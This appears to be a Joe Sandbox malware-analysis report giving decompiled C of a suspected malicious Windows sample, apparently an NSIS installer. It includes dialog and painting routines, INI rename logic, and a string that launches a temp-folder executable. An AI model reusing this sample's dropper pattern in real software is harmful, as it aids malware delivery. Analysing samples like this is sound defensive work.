                          							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406544(_t298, 0, _t326, 0, _t266)), _t298);
                          						}
                          						_t298 = _t298 + 1;
                          					} while (_t298 < 0x21);
                          					_t299 = _a16;
                          					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                          					_push(0x15);
                          					E00404463(_a4);
                          					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                          					_push(0x16);
                          					E00404463(_a4);
                          					_t300 = 0;
                          					_v16 = 0;
                          					if( *0x42a24c <= 0) {
                          						L19:
                          						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                          						goto L20;
                          					} else {
                          						_t319 = _v24 + 8;
                          						_v32 = _t319;
                          						do {
                          							_t278 =  &(_t319[0x10]);
                          							if( *_t278 != 0) {
                          								_v64 = _t278;
                          								_t279 =  *_t319;
                          								_v88 = _v16;
                          								_t311 = 0x20;
                          								_v84 = 0xffff0002;
                          								_v80 = 0xd;
                          								_v68 = _t311;
                          								_v44 = _t300;
                          								_v72 = _t279 & _t311;
                          								if((_t279 & 0x00000002) == 0) {
                          									if((_t279 & 0x00000004) == 0) {
                          										 *( *0x423700 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                          									} else {
                          										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                          									}
                          								} else {
                          									_v80 = 0x4d;
                          									_v48 = 1;
                          									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                          									_v36 = 1;
                          									 *( *0x423700 + _t300 * 4) = _t284;
                          									_v16 =  *( *0x423700 + _t300 * 4);
                          								}
                          							}
                          							_t300 = _t300 + 1;
                          							_t319 =  &(_v32[0x818]);
                          							_v32 = _t319;
                          						} while (_t300 <  *0x42a24c);
                          						if(_v36 != 0) {
                          							L20:
                          							if(_v20 != 0) {
                          								E00404498(_v8);
                          								goto L23;
                          							} else {
                          								ShowWindow(_v12, 5);
                          								E00404498(_v12);
                          								L93:
                          								return E004044CA(_a8, _a12, _a16);
                          							}
                          						}
                          						goto L19;
                          					}
                          				}
                          			}


























































                          0x00404ed7
                          0x00404ef0
                          0x00404ef5
                          0x00404efd
                          0x00404f03
                          0x00404f19
                          0x00404f1c
                          0x00405147
                          0x0040514e
                          0x00405162
                          0x00405150
                          0x00405152
                          0x00405155
                          0x00405156
                          0x0040515d
                          0x0040515d
                          0x0040516e
                          0x0040517c
                          0x0040517f
                          0x00405195
                          0x0040520a
                          0x0040520d
                          0x0040520f
                          0x00405219
                          0x00405227
                          0x00405227
                          0x00405229
                          0x00405233
                          0x00405239
                          0x0040523c
                          0x0040523f
                          0x0040525a
                          0x00405241
                          0x0040524b
                          0x0040524b
                          0x0040523f
                          0x00405233
                          0x00000000
                          0x0040520d
                          0x0040519a
                          0x004051a5
                          0x004051aa
                          0x004051b1
                          0x004051b6
                          0x004051ba
                          0x004051c5
                          0x004051c5
                          0x004051c9
                          0x004051cd
                          0x004051d1
                          0x004051e4
                          0x004051d3
                          0x004051d3
                          0x004051da
                          0x004051e0
                          0x004051dc
                          0x004051dc
                          0x004051dc
                          0x004051da
                          0x004051e8
                          0x004051ea
                          0x004051fd
                          0x00405200
                          0x00405203
                          0x00405203
                          0x004051cd
                          0x00000000
                          0x004051ba
                          0x0040519c
                          0x004051a3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040525d
                          0x0040525d
                          0x00405264
                          0x004052d5
                          0x004052dd
                          0x004052e5
                          0x004052e5
                          0x004052ee
                          0x004052f0
                          0x004052f7
                          0x004052fa
                          0x004052fa
                          0x00405300
                          0x00405307
                          0x0040530a
                          0x0040530a
                          0x00405310
                          0x00405316
                          0x0040531c
                          0x0040531c
                          0x00405329
                          0x0040548a
                          0x00405491
                          0x004054ae
                          0x004054b4
                          0x004054c6
                          0x004054c6
                          0x00000000
                          0x0040532f
                          0x00405331
                          0x00405336
                          0x0040533b
                          0x00405340
                          0x00405342
                          0x00405342
                          0x00405343
                          0x00405344
                          0x00405346
                          0x00405346
                          0x0040534e
                          0x0040538f
                          0x00405391
                          0x004053a1
                          0x004053a4
                          0x004053a9
                          0x004053b0
                          0x004053b3
                          0x00405455
                          0x0040545e
                          0x00405466
                          0x00405466
                          0x00405474
                          0x00405485
                          0x00405485
                          0x00000000
                          0x00405474
                          0x004053b9
                          0x004053bc
                          0x004053c2
                          0x004053c7
                          0x004053c9
                          0x004053cb
                          0x004053d1
                          0x004053d8
                          0x004053dd
                          0x004053e4
                          0x004053e7
                          0x004053e7
                          0x004053ee
                          0x004053fa
                          0x004053fe
                          0x00405400
                          0x00405400
                          0x004053f0
                          0x004053f2
                          0x004053f2
                          0x00405420
                          0x0040542c
                          0x0040543b
                          0x0040543b
                          0x0040543d
                          0x00405440
                          0x00405449
                          0x00000000
                          0x00405350
                          0x0040535b
                          0x0040535e
                          0x00405363
                          0x00405365
                          0x00405369
                          0x00405379
                          0x00405383
                          0x00405385
                          0x00405388
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040536b
                          0x0040536b
                          0x00405371
                          0x00405373
                          0x00405373
                          0x00405374
                          0x00405375
                          0x00000000
                          0x0040536b
                          0x0040534e
                          0x00405329
                          0x0040526c
                          0x00000000
                          0x00405282
                          0x0040528c
                          0x00405291
                          0x00000000
                          0x00000000
                          0x004052a3
                          0x004052a8
                          0x004052b4
                          0x004052b4
                          0x004052b6
                          0x004052c5
                          0x004052c7
                          0x004052cb
                          0x004052ce
                          0x00000000
                          0x004052ce
                          0x0040526c
                          0x00404f22
                          0x00404f27
                          0x00404f30
                          0x00404f37
                          0x00404f49
                          0x00404f54
                          0x00404f5a
                          0x00404f68
                          0x00404f7c
                          0x00404f81
                          0x00404f8e
                          0x00404f93
                          0x00404fa9
                          0x00404fba
                          0x00404fc7
                          0x00404fc7
                          0x00404fca
                          0x00404fd0
                          0x00404fd2
                          0x00404fd5
                          0x00404fda
                          0x00404fdf
                          0x00404fe1
                          0x00404fe1
                          0x00405001
                          0x00405001
                          0x00405003
                          0x00405004
                          0x00405009
                          0x0040500f
                          0x00405013
                          0x00405018
                          0x00405020
                          0x00405024
                          0x00405029
                          0x0040502e
                          0x00405036
                          0x00405039
                          0x00405109
                          0x0040511c
                          0x00000000
                          0x0040503f
                          0x00405042
                          0x00405045
                          0x00405048
                          0x00405048
                          0x0040504e
                          0x00405057
                          0x0040505a
                          0x0040505e
                          0x00405061
                          0x00405064
                          0x0040506d
                          0x00405076
                          0x00405079
                          0x0040507c
                          0x0040507f
                          0x004050bd
                          0x004050e8
                          0x004050bf
                          0x004050ce
                          0x004050ce
                          0x00405081
                          0x00405084
                          0x00405092
                          0x0040509c
                          0x004050a4
                          0x004050ab
                          0x004050b6
                          0x004050b6
                          0x0040507f
                          0x004050ee
                          0x004050ef
                          0x004050fb
                          0x004050fb
                          0x00405107
                          0x00405122
                          0x00405125
                          0x00405142
                          0x00000000
                          0x00405127
                          0x0040512c
                          0x00405135
                          0x004054c8
                          0x004054da
                          0x004054da
                          0x00405125
                          0x00000000
                          0x00405107
                          0x00405039

                          APIs
                          • GetDlgItem.USER32 ref: 00404EE8
                          • GetDlgItem.USER32 ref: 00404EF3
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                          • LoadImageW.USER32 ref: 00404F54
                          • SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                          • DeleteObject.GDI32(00000000), ref: 00404FCA
                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                            • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                          • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
                          • ShowWindow.USER32(?,00000005), ref: 0040512C
                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                          • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                          • GlobalFree.KERNEL32 ref: 0040530A
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                          • ShowWindow.USER32(?,00000000), ref: 004054B4
                          • GetDlgItem.USER32 ref: 004054BF
                          • ShowWindow.USER32(00000000), ref: 004054C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 2564846305-813528018
                          • Opcode ID: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
                          • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                          • Opcode Fuzzy Hash: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
                          • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E00404622(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                          				intOrPtr _v8;
                          				int _v12;
                          				void* _v16;
                          				struct HWND__* _t56;
                          				signed int _t75;
                          				signed short* _t76;
                          				signed short* _t78;
                          				long _t92;
                          				int _t103;
                          				signed int _t110;
                          				intOrPtr _t113;
                          				WCHAR* _t114;
                          				signed int* _t116;
                          				WCHAR* _t117;
                          				struct HWND__* _t118;
                          
                          				if(_a8 != 0x110) {
                          					if(_a8 != 0x111) {
                          						L13:
                          						if(_a8 != 0x4e) {
                          							if(_a8 == 0x40b) {
                          								 *0x4216d4 =  *0x4216d4 + 1;
                          							}
                          							L27:
                          							_t114 = _a16;
                          							L28:
                          							return E004044CA(_a8, _a12, _t114);
                          						}
                          						_t56 = GetDlgItem(_a4, 0x3e8);
                          						_t114 = _a16;
                          						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                          							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                          							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                          							_v12 = _t103;
                          							_v16 = _t113;
                          							_v8 = 0x4281c0;
                          							if(_t103 - _t113 < 0x800) {
                          								SendMessageW(_t56, 0x44b, 0,  &_v16);
                          								SetCursor(LoadCursorW(0, 0x7f02));
                          								_push(1);
                          								E004048D1(_a4, _v8);
                          								SetCursor(LoadCursorW(0, 0x7f00));
                          								_t114 = _a16;
                          							}
                          						}
                          						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                          							goto L28;
                          						} else {
                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                          								SendMessageW( *0x42a228, 0x111, 1, 0);
                          							}
                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                          								SendMessageW( *0x42a228, 0x10, 0, 0);
                          							}
                          							return 1;
                          						}
                          					}
                          					if(_a12 >> 0x10 != 0 ||  *0x4216d4 != 0) {
                          						goto L27;
                          					} else {
                          						_t116 =  *0x4226e0 + 0x14;
                          						if(( *_t116 & 0x00000020) == 0) {
                          							goto L27;
                          						}
                          						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                          						E00404485(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                          						E004048AD();
                          						goto L13;
                          					}
                          				}
                          				_t117 = _a16;
                          				_t75 =  *(_t117 + 0x30);
                          				if(_t75 < 0) {
                          					_t75 =  *( *0x4291fc - 4 + _t75 * 4);
                          				}
                          				_t76 =  *0x42a258 + _t75 * 2;
                          				_t110 =  *_t76 & 0x0000ffff;
                          				_a8 = _t110;
                          				_t78 =  &(_t76[1]);
                          				_a16 = _t78;
                          				_v16 = _t78;
                          				_v12 = 0;
                          				_v8 = E004045D3;
                          				if(_t110 != 2) {
                          					_v8 = E00404599;
                          				}
                          				_push( *((intOrPtr*)(_t117 + 0x34)));
                          				_push(0x22);
                          				E00404463(_a4);
                          				_push( *((intOrPtr*)(_t117 + 0x38)));
                          				_push(0x23);
                          				E00404463(_a4);
                          				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                          				E00404485( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                          				_t118 = GetDlgItem(_a4, 0x3e8);
                          				E00404498(_t118);
                          				SendMessageW(_t118, 0x45b, 1, 0);
                          				_t92 =  *( *0x42a230 + 0x68);
                          				if(_t92 < 0) {
                          					_t92 = GetSysColor( ~_t92);
                          				}
                          				SendMessageW(_t118, 0x443, 0, _t92);
                          				SendMessageW(_t118, 0x445, 0, 0x4010000);
                          				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                          				 *0x4216d4 = 0;
                          				SendMessageW(_t118, 0x449, _a8,  &_v16);
                          				 *0x4216d4 = 0;
                          				return 0;
                          			}


















                          0x00404634
                          0x00404761
                          0x004047be
                          0x004047c2
                          0x0040488f
                          0x00404891
                          0x00404891
                          0x00404897
                          0x00404897
                          0x0040489a
                          0x00000000
                          0x004048a1
                          0x004047d0
                          0x004047d6
                          0x004047e0
                          0x004047eb
                          0x004047ee
                          0x004047f1
                          0x004047fc
                          0x004047ff
                          0x00404806
                          0x00404813
                          0x00404824
                          0x0040482a
                          0x00404832
                          0x00404840
                          0x00404846
                          0x00404846
                          0x00404806
                          0x00404850
                          0x00000000
                          0x0040485b
                          0x0040485f
                          0x0040486f
                          0x0040486f
                          0x00404875
                          0x00404881
                          0x00404881
                          0x00000000
                          0x00404885
                          0x00404850
                          0x0040476c
                          0x00000000
                          0x0040477e
                          0x00404783
                          0x00404789
                          0x00000000
                          0x00000000
                          0x004047b2
                          0x004047b4
                          0x004047b9
                          0x00000000
                          0x004047b9
                          0x0040476c
                          0x0040463a
                          0x0040463d
                          0x00404642
                          0x00404653
                          0x00404653
                          0x0040465b
                          0x0040465e
                          0x00404662
                          0x00404665
                          0x00404669
                          0x0040466c
                          0x0040466f
                          0x00404672
                          0x00404679
                          0x0040467b
                          0x0040467b
                          0x00404685
                          0x00404692
                          0x0040469c
                          0x004046a1
                          0x004046a4
                          0x004046a9
                          0x004046c0
                          0x004046c7
                          0x004046da
                          0x004046dd
                          0x004046f1
                          0x004046f8
                          0x004046fd
                          0x00404702
                          0x00404702
                          0x00404710
                          0x0040471e
                          0x00404730
                          0x00404735
                          0x00404745
                          0x00404747
                          0x00000000

                          APIs
                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                          • GetDlgItem.USER32 ref: 004046D4
                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                          • GetSysColor.USER32(?), ref: 00404702
                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                          • lstrlenW.KERNEL32(?), ref: 00404723
                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                          • GetDlgItem.USER32 ref: 0040479E
                          • SendMessageW.USER32(00000000), ref: 004047A5
                          • GetDlgItem.USER32 ref: 004047D0
                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                          • SetCursor.USER32(00000000), ref: 00404824
                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                          • SetCursor.USER32(00000000), ref: 00404840
                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                          Strings
                          • C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl, xrefs: 004047FF
                          • N, xrefs: 004047BE
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl$N
                          • API String ID: 3103080414-1755666630
                          • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                          • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                          • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                          • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                          				struct tagLOGBRUSH _v16;
                          				struct tagRECT _v32;
                          				struct tagPAINTSTRUCT _v96;
                          				struct HDC__* _t70;
                          				struct HBRUSH__* _t87;
                          				struct HFONT__* _t94;
                          				long _t102;
                          				signed int _t126;
                          				struct HDC__* _t128;
                          				intOrPtr _t130;
                          
                          				if(_a8 == 0xf) {
                          					_t130 =  *0x42a230;
                          					_t70 = BeginPaint(_a4,  &_v96);
                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                          					_a8 = _t70;
                          					GetClientRect(_a4,  &_v32);
                          					_t126 = _v32.bottom;
                          					_v32.bottom = _v32.bottom & 0x00000000;
                          					while(_v32.top < _t126) {
                          						_a12 = _t126 - _v32.top;
                          						asm("cdq");
                          						asm("cdq");
                          						asm("cdq");
                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                          						_t87 = CreateBrushIndirect( &_v16);
                          						_v32.bottom = _v32.bottom + 4;
                          						_a16 = _t87;
                          						FillRect(_a8,  &_v32, _t87);
                          						DeleteObject(_a16);
                          						_v32.top = _v32.top + 4;
                          					}
                          					if( *(_t130 + 0x58) != 0xffffffff) {
                          						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                          						_a16 = _t94;
                          						if(_t94 != 0) {
                          							_t128 = _a8;
                          							_v32.left = 0x10;
                          							_v32.top = 8;
                          							SetBkMode(_t128, 1);
                          							SetTextColor(_t128,  *(_t130 + 0x58));
                          							_a8 = SelectObject(_t128, _a16);
                          							DrawTextW(_t128, 0x429220, 0xffffffff,  &_v32, 0x820);
                          							SelectObject(_t128, _a8);
                          							DeleteObject(_a16);
                          						}
                          					}
                          					EndPaint(_a4,  &_v96);
                          					return 0;
                          				}
                          				_t102 = _a16;
                          				if(_a8 == 0x46) {
                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                          					 *((intOrPtr*)(_t102 + 4)) =  *0x42a228;
                          				}
                          				return DefWindowProcW(_a4, _a8, _a12, _t102);
                          			}













                          0x0040100a
                          0x00401039
                          0x00401047
                          0x0040104d
                          0x00401051
                          0x0040105b
                          0x00401061
                          0x00401064
                          0x004010f3
                          0x00401089
                          0x0040108c
                          0x004010a6
                          0x004010bd
                          0x004010cc
                          0x004010cf
                          0x004010d5
                          0x004010d9
                          0x004010e4
                          0x004010ed
                          0x004010ef
                          0x004010ef
                          0x00401100
                          0x00401105
                          0x0040110d
                          0x00401110
                          0x00401112
                          0x00401118
                          0x0040111f
                          0x00401126
                          0x00401130
                          0x00401142
                          0x00401156
                          0x00401160
                          0x00401165
                          0x00401165
                          0x00401110
                          0x0040116e
                          0x00000000
                          0x00401178
                          0x00401010
                          0x00401013
                          0x00401015
                          0x0040101f
                          0x0040101f
                          0x00000000

                          APIs
                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32(?,?), ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32 ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F
                          • API String ID: 941294808-1304234792
                          • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                          • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                          • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                          • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040614D(void* __ecx) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				long _t12;
                          				long _t24;
                          				char* _t31;
                          				int _t37;
                          				void* _t38;
                          				intOrPtr* _t39;
                          				long _t42;
                          				WCHAR* _t44;
                          				void* _t46;
                          				void* _t48;
                          				void* _t49;
                          				void* _t52;
                          				void* _t53;
                          
                          				_t38 = __ecx;
                          				_t44 =  *(_t52 + 0x14);
                          				 *0x426da8 = 0x55004e;
                          				 *0x426dac = 0x4c;
                          				if(_t44 == 0) {
                          					L3:
                          					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275a8, 0x400);
                          					if(_t12 != 0 && _t12 <= 0x400) {
                          						_t37 = wsprintfA(0x4269a8, "%ls=%ls\r\n", 0x426da8, 0x4275a8);
                          						_t53 = _t52 + 0x10;
                          						E00406544(_t37, 0x400, 0x4275a8, 0x4275a8,  *((intOrPtr*)( *0x42a230 + 0x128)));
                          						_t12 = E00405FF7(0x4275a8, 0xc0000000, 4);
                          						_t48 = _t12;
                          						 *(_t53 + 0x18) = _t48;
                          						if(_t48 != 0xffffffff) {
                          							_t42 = GetFileSize(_t48, 0);
                          							_t6 = _t37 + 0xa; // 0xa
                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                          							if(_t46 == 0 || E0040607A(_t48, _t46, _t42) == 0) {
                          								L18:
                          								return CloseHandle(_t48);
                          							} else {
                          								if(E00405F5C(_t38, _t46, "[Rename]\r\n") != 0) {
                          									_t49 = E00405F5C(_t38, _t21 + 0xa, "\n[");
                          									if(_t49 == 0) {
                          										_t48 =  *(_t53 + 0x18);
                          										L16:
                          										_t24 = _t42;
                          										L17:
                          										E00405FB2(_t24 + _t46, 0x4269a8, _t37);
                          										SetFilePointer(_t48, 0, 0, 0);
                          										E004060A9(_t48, _t46, _t42 + _t37);
                          										GlobalFree(_t46);
                          										goto L18;
                          									}
                          									_t39 = _t46 + _t42;
                          									_t31 = _t39 + _t37;
                          									while(_t39 > _t49) {
                          										 *_t31 =  *_t39;
                          										_t31 = _t31 - 1;
                          										_t39 = _t39 - 1;
                          									}
                          									_t24 = _t49 - _t46 + 1;
                          									_t48 =  *(_t53 + 0x18);
                          									goto L17;
                          								}
                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                          								_t42 = _t42 + 0xa;
                          								goto L16;
                          							}
                          						}
                          					}
                          				} else {
                          					CloseHandle(E00405FF7(_t44, 0, 1));
                          					_t12 = GetShortPathNameW(_t44, 0x426da8, 0x400);
                          					if(_t12 != 0 && _t12 <= 0x400) {
                          						goto L3;
                          					}
                          				}
                          				return _t12;
                          			}



















                          0x0040614d
                          0x00406156
                          0x0040615d
                          0x00406167
                          0x0040617b
                          0x004061a3
                          0x004061ae
                          0x004061b2
                          0x004061d2
                          0x004061d9
                          0x004061e3
                          0x004061f0
                          0x004061f5
                          0x004061fa
                          0x004061fe
                          0x0040620d
                          0x0040620f
                          0x0040621c
                          0x00406220
                          0x004062bb
                          0x00000000
                          0x00406236
                          0x00406243
                          0x00406267
                          0x0040626b
                          0x0040628a
                          0x0040628e
                          0x0040628e
                          0x00406290
                          0x00406299
                          0x004062a4
                          0x004062af
